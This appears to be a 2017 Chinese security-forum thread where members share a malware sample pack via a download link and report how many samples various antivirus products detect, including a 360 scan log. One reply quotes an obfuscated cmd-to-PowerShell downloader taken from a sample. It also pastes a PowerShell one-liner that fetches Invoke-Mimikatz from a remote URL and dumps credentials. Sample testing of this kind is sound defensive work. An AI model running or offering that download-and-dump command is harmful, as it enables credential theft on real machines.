查看: 1464|回复: 11
收起左侧

[病毒样本] 【11.08】#VirusPackage 10x

[复制链接]
Jerry.Lin
发表于 2017-11-8 22:55:34 | 显示全部楼层 |阅读模式
本帖最后由 191196846 于 2017-11-8 23:16 编辑

https://pan.baidu.com/s/1i5gougt

火绒KILL2

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
心醉咖啡
发表于 2017-11-8 23:10:24 | 显示全部楼层
360

  1. 360杀毒扫描日志

  2. 病毒库版本:
  3. 扫描时间:2017-11-08 23:09:42
  4. 扫描用时:00:00:03
  5. 扫描类型:右键扫描
  6. 扫描文件总数:10
  7. 项目总数:6
  8. 清除项目数:6

  9. 扫描选项
  10. ----------------------
  11. 扫描所有文件:是
  12. 扫描压缩包:是
  13. 发现病毒处理方式:由用户选择处理
  14. 扫描磁盘引导区:是
  15. 扫描 Rootkit:是
  16. 使用云查杀引擎:是
  17. 使用QVM人工智能引擎:是
  18. 扫描建议修复项:是
  19. 常规引擎设置:未使用

  20. 扫描内容
  21. ----------------------
  22. F:\浏览器下载\Virus10x 22491108


  23. 白名单设置
  24. ----------------------


  25. 扫描结果
  26. ======================
  27. 高危风险项
  28. ----------------------
  29. F:\浏览器下载\Virus10x 22491108\5c9751673ff900d2a904fd574a617b95a1a0438c178b95cfcfe5e0405eef010d.bin.exe        HEUR/QVM20.1.07C6.Malware.Gen        已删除
  30. F:\浏览器下载\Virus10x 22491108\fa7aa03c7b5dda057283fbc72f9e829dc7bb2dcb2a9e49bcad9ebb2084068f8a.bin.rtf        virus.exp.20170199        已删除
  31. F:\浏览器下载\Virus10x 22491108\b2eb37afdd6dc278ff8841560b655d31c2690bd0cc4073263314bf4d9390fd1a.bin.exe        HEUR/QVM20.1.0CF3.Malware.Gen        已删除
  32. F:\浏览器下载\Virus10x 22491108\b63f1b808b583f54245bafdec6013557c22ae247fade9ce47d25317299bda5ad.bin.exe        HEUR/QVM11.1.0CF3.Malware.Gen        已删除
  33. F:\浏览器下载\Virus10x 22491108\cd91143d8634199004677c14fd1919b8cf01397979e9839f5325d8beade1609b.bin.exe        HEUR/QVM20.1.0CF3.Malware.Gen        已删除
  34. F:\浏览器下载\Virus10x 22491108\6d0d7e3180a65517917e9d46f13a0ab6d54bc194edc950130aff9f3bec564d95.bin.DOC        virus.office.qexvmc.1090        已修复



  35. 可疑文件上传结果
  36. ----------------------
  37. f:\浏览器下载\virus10x 22491108\6d0d7e3180a65517917e9d46f13a0ab6d54bc194edc950130aff9f3bec564d95.bin.doc        上传成功
  38. f:\浏览器下载\virus10x 22491108\cd91143d8634199004677c14fd1919b8cf01397979e9839f5325d8beade1609b.bin.exe        上传成功
复制代码
zst470396853
发表于 2017-11-8 23:24:06 | 显示全部楼层
本帖最后由 zst470396853 于 2017-11-8 23:26 编辑

360 kill 6个



上传


鉴定结果



QQkill  5个


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ELOHIM
发表于 2017-11-8 23:46:32 | 显示全部楼层
本帖最后由 ELOHIM 于 2017-11-9 00:01 编辑

WIEP kill 5 修复 1 余 4

  1. C:\Windows\system32\cmd.exe /C "c^md.e^xe ^/V ^/^C ^se^t^ bv=e^^rs^&^&set^ ^kc=^^he^^ll^&^&set^ ^o^a=^^p^^ow^&^&^s^e^t^ ^tt^=^^Wi^^ndows!^oa^!^!^bv^!!^kc^!\^^v1^^.^^0\!^oa!!bv^!^!kc^!^&^&ec^ho^ Ie^^X(^^^"^^I`E^^X^^`(^^n^^E`w^^`-^^`Ob`j^^ECt^^ ^^nE^^t^^`.W^^Eb
复制代码
哪位告知一下,这个快捷方式是什么意思啊?


去掉“^”吗?那么,系统是怎么忽略"^"的呢???
  1. C:\Windows\system32\cmd.exe /C "cmd.exe /V /C set bv=ers&&set kc=hell&&set oa=pow&&set tt=Windows!oa!!bv!!kc!\v1.0\!oa!!bv!!kc!&&echo IeX("I`EX`(nE`w`-`Ob`jECt nEt`.WEb
复制代码
我知道想调用 powershell,但是求解答…………

好吧,没人理我,我自己搜答案,下面是我搜到的。
一句powershell调用mimikatz抓密码
Security Off
2015-04-13
mimikatz

国外大神clymb3r写的一个powershell脚本将mimikatz注入到内存调用logonPasswords获取密码,使用起来相当轻便。
以管理员权限启动CMD执行下以命令即可

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI');Invoke-Mimikatz -DumpCreds"

实战中如果机器不能上外网可以将脚本下载回来放到内网的web service上。

willjjyu
发表于 2017-11-8 23:54:17 | 显示全部楼层

KIS 18 病毒库11.8 12:09
KILL 6 修复 1 miss 3



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
欧阳宣
头像被屏蔽
发表于 2017-11-9 06:19:45 | 显示全部楼层
MBAM 4x
jayavira
发表于 2017-11-9 08:25:12 | 显示全部楼层
换个密码吧
我都怀疑360TSE可以识别infected这个密码了
Jerry.Lin
 楼主| 发表于 2017-11-9 08:41:28 | 显示全部楼层
jayavira 发表于 2017-11-9 08:25
换个密码吧
我都怀疑360TSE可以识别infected这个密码了

貌似QEX应该能文件名启发
540923555
发表于 2017-11-9 08:41:42 | 显示全部楼层
WD删除6个
jayavira
发表于 2017-11-9 09:00:53 | 显示全部楼层
191196846 发表于 2017-11-9 08:41
貌似QEX应该能文件名启发

不可能吧
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 22:32 , Processed in 0.134839 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表